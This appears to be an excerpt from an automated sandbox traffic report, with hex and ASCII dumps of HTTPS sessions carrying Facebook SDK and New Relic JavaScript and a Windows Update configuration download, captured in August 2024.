                                                                                                                                                                                                        2024-08-30 16:15:44 UTC15033INData Raw: 2a 31 37 32 35 30 33 31 30 33 32 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 31 36 31 30 38 32 37 32 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20
                                                                                                                                                                                                        Data Ascii: *1725031032,,JIT Construction: v1016108272,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC16384INData Raw: 2b 46 28 32 2c 67 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 3b 62 72 65 61 6b 7d 62 2b 3d 65 3f 66 5b 63 5d 3a 61 2e 63 68 61 72 41 74 28 63 29 7d 7d 72 65 74 75 72 6e 20 62 2b 27 22 27 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 2c 69 2c 6a 2c 6b 2c 6d 2c 72 2c 73 2c 74 2c 7a 2c 42 3b 74 72 79 7b 68 3d 62 5b 61 5d 7d 63 61 74 63 68 28 61 29 7b 7d 69 66 28 74 79 70 65 6f 66 20 68 3d 3d 22 6f 62 6a 65 63 74 22 26 26 68 29 7b 69 3d 6e 2e 63 61 6c 6c 28 68 29 3b 69 66 28 69 3d 3d 75 26 26 21 6f 2e 63 61 6c 6c 28 68 2c 22 74 6f 4a 53 4f 4e 22 29 29 69 66 28 68 3e 2d 31 2f 30 26 26 68 3c 31 2f 30 29 7b 69 66 28 43 29 7b 6d 3d 41 28 68 2f 38 36 34 65 35 29 3b 66 6f 72 28 6a 3d 41 28 6d 2f 33 36 35 2e 32 34
                                                                                                                                                                                                        Data Ascii: +F(2,g.toString(16));break}b+=e?f[c]:a.charAt(c)}}return b+'"'},I=function(a,b,c,d,e,f,g){var h,i,j,k,m,r,s,t,z,B;try{h=b[a]}catch(a){}if(typeof h=="object"&&h){i=n.call(h);if(i==u&&!o.call(h,"toJSON"))if(h>-1/0&&h<1/0){if(C){m=A(h/864e5);for(j=A(m/365.24
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC16384INData Raw: 66 62 5f 64 69 61 6c 6f 67 5f 63 6f 6e 74 65 6e 74 20 2e 64 69 61 6c 6f 67 5f 68 65 61 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 66 72 6f 6d 28 23 37 33 38 61 62 61 29 2c 20 74 6f 28 23 32 63 34 39 38 37 29 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 34 33 62 38 37 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 77 68 69 74 65 20 30 20 31 70 78 20 31 70 78 20 2d 31 70 78 20 69 6e 73 65 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 3a 62 6f 6c 64 20 31 34 70 78 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 72
                                                                                                                                                                                                        Data Ascii: fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:r
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 76 61 72 20 64 3b 64 3d 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 21 3d 3d 6e 75 6c 6c 26 26 62 21 3d 3d 76 6f 69 64 20 30 3f 62 3a 22 22 29 7c 7c 74 68 69 73 3b 62 21 3d 3d 6e 75 6c 6c 26 26 62 21 3d 3d 76 6f 69 64 20 30 3f 64 2e 6d 65 73 73 61 67 65 3d 62 3a 64 2e 6d 65 73 73 61 67 65 3d 22 22 3b 64 2e 69 6e 6e 65 72 45 72 72 6f 72 3d 63 3b 72 65 74 75 72 6e 20 64 7d 72 65 74 75 72 6e 20 62 7d 28 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 77 72 61 70 4e 61 74 69 76 65 53 75 70 65 72 28 45 72 72 6f 72 29 29 3b 66
                                                                                                                                                                                                        Data Ascii: function(a,b,c,d,e,f){a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){var d;d=a.call(this,b!==null&&b!==void 0?b:"")||this;b!==null&&b!==void 0?d.message=b:d.message="";d.innerError=c;return d}return b}(babelHelpers.wrapNativeSuper(Error));f
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC1500INData Raw: 64 61 74 65 55 73 65 72 50 72 6f 70 65 72 74 69 65 73 3a 7a 2c 73 65 74 41 70 70 56 65 72 73 69 6f 6e 3a 77 2c 67 65 74 41 70 70 56 65 72 73 69 6f 6e 3a 78 2c 63 6c 65 61 72 41 70 70 56 65 72 73 69 6f 6e 3a 79 2c 45 76 65 6e 74 4e 61 6d 65 73 3a 68 2c 50 61 72 61 6d 65 74 65 72 4e 61 6d 65 73 3a 6a 7d 29 3b 67 2e 61 73 73 65 72 74 47 65 74 56 61 6c 69 64 41 70 70 49 44 3d 41 3b 67 2e 61 73 73 65 72 74 56 61 6c 69 64 55 73 65 72 50 72 6f 70 65 72 74 69 65 73 3d 42 3b 67 2e 61 73 73 65 72 74 56 61 6c 69 64 45 76 65 6e 74 4e 61 6d 65 3d 43 3b 67 2e 61 73 73 65 72 74 56 61 6c 69 64 41 70 70 56 65 72 73 69 6f 6e 3d 44 3b 67 2e 61 73 73 65 72 74 56 61 6c 69 64 55 73 65 72 49 44 3d 45 3b 67 2e 41 70 70 45 76 65 6e 74 73 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28
                                                                                                                                                                                                        Data Ascii: dateUserProperties:z,setAppVersion:w,getAppVersion:x,clearAppVersion:y,EventNames:h,ParameterNames:j});g.assertGetValidAppID=A;g.assertValidUserProperties=B;g.assertValidEventName=C;g.assertValidAppVersion=D;g.assertValidUserID=E;g.AppEvents=a}),98);__d(
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC14884INData Raw: 73 29 7d 62 3d 7b 69 6e 69 74 3a 61 7d 3b 65 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 65 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 73 64 6b 2e 41 75 74 68 53 74 61 74 65 22 2c 5b 22 73 64 6b 2e 41 75 74 68 55 74 69 6c 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 69 28 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 76 61 72 20 61 3d 7b 69 67 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c 6c 2c 66 62 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c 6c 2c 66 62 4c 6f 67 69 6e 53 74 61 74 75 73 3a 6e 75 6c 6c 2c 69 67 4c 6f 67 69 6e 53 74 61 74 75 73 3a 6e 75 6c 6c 7d 3b 72 65 74 75 72 6e 7b 63 75 72 72 65 6e 74 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c
                                                                                                                                                                                                        Data Ascii: s)}b={init:a};e=b;g["default"]=e}),98);__d("sdk.AuthState",["sdk.AuthUtils"],(function(a,b,c,d,e,f,g){"use strict";var h=i();function i(){var a={igAuthResponse:null,fbAuthResponse:null,fbLoginStatus:null,igLoginStatus:null};return{currentAuthResponse:nul
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC16384INData Raw: 41 63 63 65 73 73 65 64 3c 63 26 26 6f 5b 22 64 65 6c 65 74 65 22 5d 28 68 29 7d 70 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 61 29 7b 71 28 29 3b 76 61 72 20 63 3d 62 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 53 69 6e 63 65 41 70 70 53 74 61 72 74 22 29 28 29 2c 64 3d 6f 2e 67 65 74 28 61 29 3b 69 66 28 64 3d 3d 6e 75 6c 6c 29 7b 6f 2e 73 65 74 28 61 2c 7b 64 72 6f 70 70 65 64 3a 30 2c 6c 6f 67 67 65 64 3a 5b 63 5d 2c 6c 61 73 74 41 63 63 65 73 73 65 64 3a 63 7d 29 3b 72 65 74 75 72 6e 20 31 7d 61 3d 64 2e 64 72 6f 70 70 65 64 3b 76 61 72 20 65 3d 64 2e 6c 6f 67 67 65 64 3b 64 2e 6c 61 73 74 41 63 63 65 73 73 65 64 3d 63 3b 77 68 69 6c 65 28 65 5b 30 5d 3c 63 2d 6d 29 65 2e 73 68 69 66 74 28 29 3b 69 66 28 65 2e 6c 65 6e 67 74 68 3c 6c 29 7b 64
                                                                                                                                                                                                        Data Ascii: Accessed<c&&o["delete"](h)}p=a}}function r(a){q();var c=b("performanceNowSinceAppStart")(),d=o.get(a);if(d==null){o.set(a,{dropped:0,logged:[c],lastAccessed:c});return 1}a=d.dropped;var e=d.logged;d.lastAccessed=c;while(e[0]<c-m)e.shift();if(e.length<l){d
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC16384INData Raw: 3d 6c 2e 6d 65 74 61 64 61 74 61 2e 63 6f 6e 63 61 74 28 68 2e 66 6f 72 6d 61 74 28 29 29 2c 71 3d 6e 65 77 20 53 65 74 28 70 29 3b 6c 2e 6d 65 74 61 64 61 74 61 3d 45 53 28 22 41 72 72 61 79 22 2c 22 66 72 6f 6d 22 2c 21 31 2c 71 2e 76 61 6c 75 65 73 28 29 29 7d 69 66 28 65 2e 6c 65 6e 67 74 68 3e 30 29 7b 69 66 28 6c 2e 65 76 65 6e 74 73 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 72 3b 28 72 3d 6c 2e 65 76 65 6e 74 73 29 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 65 29 7d 65 6c 73 65 20 6c 2e 65 76 65 6e 74 73 3d 5b 5d 2e 63 6f 6e 63 61 74 28 65 29 3b 69 66 28 6c 2e 65 76 65 6e 74 73 21 3d 6e 75 6c 6c 26 26 6c 2e 65 76 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 79 61 29 7b 76 61 72 20 73 3d 6c 2e 65 76 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 79 61 3b 6c 2e 65 76 65 6e 74
                                                                                                                                                                                                        Data Ascii: =l.metadata.concat(h.format()),q=new Set(p);l.metadata=ES("Array","from",!1,q.values())}if(e.length>0){if(l.events!=null){var r;(r=l.events).push.apply(r,e)}else l.events=[].concat(e);if(l.events!=null&&l.events.length>ya){var s=l.events.length-ya;l.event


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.54974140.127.169.103443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                        MS-CorrelationId: d6571195-f6e9-42a2-a94a-cb5fd6a54dca
                                                                                                                                                                                                        MS-RequestId: c002e1d7-9236-402e-ad06-c45e4384c30e
                                                                                                                                                                                                        MS-CV: syw3Bo7o1U6/HcON.0
                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:15:47 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.549749162.247.243.394436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC537OUTGET /nr-spa-1215.min.js HTTP/1.1
                                                                                                                                                                                                        Host: js-agent.newrelic.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://indd.adobe.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 47680
                                                                                                                                                                                                        Last-Modified: Wed, 18 Oct 2023 21:31:15 GMT
                                                                                                                                                                                                        ETag: "7e1862f7a390ed9fc02c299216395547"
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=86400, stale-if-error=86400
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:15:48 GMT
                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890034-NYC
                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Strict-Transport-Security: max-age=300
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6f 29 7b 69 66 28 21 6e 5b 65 5d 29 7b 69 66 28 21 74 5b 65 5d 29 7b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 6e 72 5f 72 65 71 75 69 72 65 26 26 5f 5f 6e 72 5f 72 65 71 75 69 72 65 3b 69 66 28 21 6f 26 26 61 29 72 65 74 75 72 6e 20 61 28 65 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 65 2c 21 30 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 7d 76 61 72 20 73 3d 6e 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 65 5d 5b 30 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76
                                                                                                                                                                                                        Data Ascii: !function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){v
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 6e 3a 74 2c 6d 61 78 3a 74 2c 73 6f 73 3a 74 2a 74 2c 63 3a 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 6e 2c 65 2c 72 29 7b 67 5b 74 5d 7c 7c 28 67 5b 74 5d 3d 7b 7d 29 3b 76 61 72 20 69 3d 67 5b 74 5d 5b 6e 5d 3b 72 65 74 75 72 6e 20 69 7c 7c 28 69 3d 67 5b 74 5d 5b 6e 5d 3d 7b 70 61 72 61 6d 73 3a 65 7c 7c 7b 7d 7d 2c 72 26 26 28 69 2e 63 75 73 74 6f 6d 3d 72 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 67 5b 74 5d 26 26 67 5b 74 5d 5b 6e 5d 3a 67 5b 74 5d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 7b 7d 2c 65 3d 22 22 2c 72 3d 21 31 2c 69 3d 30 3b 69 3c 74 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 65 3d 74 5b 69 5d 2c 6e 5b 65 5d 3d 70 28 67 5b 65 5d 29 2c 6e 5b 65 5d 2e 6c 65
                                                                                                                                                                                                        Data Ascii: n:t,max:t,sos:t*t,c:1}}function d(t,n,e,r){g[t]||(g[t]={});var i=g[t][n];return i||(i=g[t][n]={params:e||{}},r&&(i.custom=r)),i}function l(t,n){return n?g[t]&&g[t][n]:g[t]}function h(t){for(var n={},e="",r=!1,i=0;i<t.length;i++)e=t[i],n[e]=p(g[e]),n[e].le
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 32 30 30 29 29 7d 76 61 72 20 64 3d 74 28 31 37 29 2c 6c 3d 74 28 31 30 29 2c 68 3d 74 28 32 29 2c 70 3d 74 28 31 39 29 2c 6d 3d 74 28 32 33 29 2c 76 3d 74 28 34 38 29 2c 67 3d 74 28 22 6c 6f 61 64 65 72 22 29 2c 79 3d 74 28 22 68 61 6e 64 6c 65 22 29 2c 78 3d 74 28 34 31 29 2c 77 3d 74 28 34 35 29 2c 62 3d 30 2c 54 3d 78 2e 67 65 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 28 22 73 73 6c 22 29 3d 3d 3d 21 31 3f 22 68 74 74 70 22 3a 22 68 74 74 70 73 22 3b 6c 2e 6f 6e 28 22 6a 73 65 72 72 6f 72 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 62 6f 64 79 3a 68 2e 74 61 6b 65 28 5b 22 63 6d 22 2c 22 73 6d 22 5d 29 7d 7d 29 2c 64 28 22 73 74 6f 72 65 4d 65 74 72 69 63 22 2c 72 2c 22 61 70 69 22 29 2c 64 28 22 73 74 6f 72 65 45 76 65 6e 74 4d 65
                                                                                                                                                                                                        Data Ascii: 200))}var d=t(17),l=t(10),h=t(2),p=t(19),m=t(23),v=t(48),g=t("loader"),y=t("handle"),x=t(41),w=t(45),b=0,T=x.getConfiguration("ssl")===!1?"http":"https";l.on("jserrors",function(){return{body:h.take(["cm","sm"])}}),d("storeMetric",r,"api"),d("storeEventMe
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 70 6c 61 63 65 28 6e 3f 72 3a 69 2c 22 24 31 24 32 22 29 7d 7d 2c 7b 7d 5d 2c 36 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 5b 31 5d 3b 6f 28 6e 5b 65 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 76 61 72 20 72 3d 74 5b 30 5d 2c 69 3d 65 5b 30 5d 3b 69 66 28 69 3d 3d 3d 72 29 7b 76 61 72 20 6f 3d 65 5b 31 5d 2c 61 3d 74 5b 33 5d 2c 73 3d 74 5b 32 5d 3b 6f 2e 61 70 70 6c 79 28 61 2c 73 29 7d 7d 29 7d 76 61 72 20 69 3d 74 28 22 65 65 22 29 2c 6f 3d 74 28 34 38 29 2c 61 3d 74 28 31 37 29 2e 68 61 6e 64 6c 65 72 73 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 69 2e 62 61 63 6b 6c 6f 67 5b 74 5d 2c 65 3d 61 5b 74 5d 3b 69 66 28 65 29 7b
                                                                                                                                                                                                        Data Ascii: place(n?r:i,"$1$2")}},{}],6:[function(t,n,e){function r(t,n){var e=t[1];o(n[e],function(n,e){var r=t[0],i=e[0];if(i===r){var o=e[1],a=t[3],s=t[2];o.apply(a,s)}})}var i=t("ee"),o=t(48),a=t(17).handlers;n.exports=function(t){var n=i.backlog[t],e=a[t];if(e){
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 2c 65 29 7b 74 68 69 73 2e 6c 6f 61 64 65 72 3d 74 2c 74 68 69 73 2e 65 6e 64 70 6f 69 6e 74 3d 6e 2c 74 68 69 73 2e 6f 70 74 73 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 73 74 61 72 74 65 64 3d 21 31 2c 74 68 69 73 2e 74 69 6d 65 6f 75 74 48 61 6e 64 6c 65 3d 6e 75 6c 6c 7d 76 61 72 20 69 3d 74 28 31 30 29 2c 6f 3d 74 28 32 33 29 3b 6e 2e 65 78 70 6f 72 74 73 3d 72 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 54 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 74 2c 74 68 69 73 2e 73 74 61 72 74 65 64 3d 21 30 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 48 61 72 76 65 73 74 28 6e 75 6c 6c 21 3d 6e 3f 6e 3a 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 29
                                                                                                                                                                                                        Data Ascii: n,e){function r(t,n,e){this.loader=t,this.endpoint=n,this.opts=e||{},this.started=!1,this.timeoutHandle=null}var i=t(10),o=t(23);n.exports=r,r.prototype.startTimer=function(t,n){this.interval=t,this.started=!0,this.scheduleHarvest(null!=n?n:this.interval)
                                                                                                                                                                                                        2024-08-30 16:15:48 UTC1378INData Raw: 75 72 65 73 22 2c 22 71 74 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 71 75 65 75 65 54 69 6d 65 7d 29 2c 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 26 26 45 2e 73 74 6f 72 65 28 22 6d 65 61 73 75 72 65 73 22 2c 22 61 70 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 7d 29 2c 53 2e 6d 65 61 73 75 72 65 28 22 62 65 22 2c 22 73 74 61 72 74 74 69 6d 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 29 2c 53 2e 6d 65 61 73 75 72 65 28 22 66 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 2c 22 6f 6e 6c 6f 61 64 22 29 2c 53 2e 6d 65 61 73 75 72 65 28 22 64 63 22 2c 22 66 69 72 73 74 62 79 74 65 22 2c 22 64 6f 6d 43 6f 6e 74 65 6e 74 22 29 3b 76 61 72 20 6e 3d 45 2e 67 65 74 28 22 6d 65 61 73 75 72 65
                                                                                                                                                                                                        Data Ascii: ures","qt",{value:t.info.queueTime}),t.info.applicationTime&&E.store("measures","ap",{value:t.info.applicationTime}),S.measure("be","starttime","firstbyte"),S.measure("fe","firstbyte","onload"),S.measure("dc","firstbyte","domContent");var n=E.get("measure
